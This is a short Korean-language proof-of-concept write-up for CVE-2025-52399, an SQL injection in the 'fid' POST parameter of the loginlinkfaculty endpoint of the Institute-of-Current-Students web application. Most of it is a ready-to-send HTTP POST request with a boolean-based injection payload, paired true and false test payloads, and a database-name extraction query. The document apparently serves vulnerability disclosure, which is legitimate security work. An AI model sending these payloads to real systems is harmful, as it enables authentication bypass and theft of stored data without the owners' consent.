
CVE-2025-52399용 개념 증명 익스플로잇으로, Institute-of-Current-Students의 loginlinkfaculty 엔드포인트에서 SQL 인젝션을 보여주어 인증 우회 및 데이터 추출을 가능하게 합니다.
Institute-of-Current-Students 애플리케이션의 loginlinkfaculty 엔드포인트는 fid POST 매개변수를 통해 SQL 인젝션에 취약합니다. 이 매개변수는 SQL 쿼리에 사용되기 전에 적절히 검증되지 않아, 원격 공격자가 임의의 SQL 명령을 실행할 수 있습니다.
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → 참
❌ -1' OR 2*3=4 AND 000942=000942 -- → 거짓
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov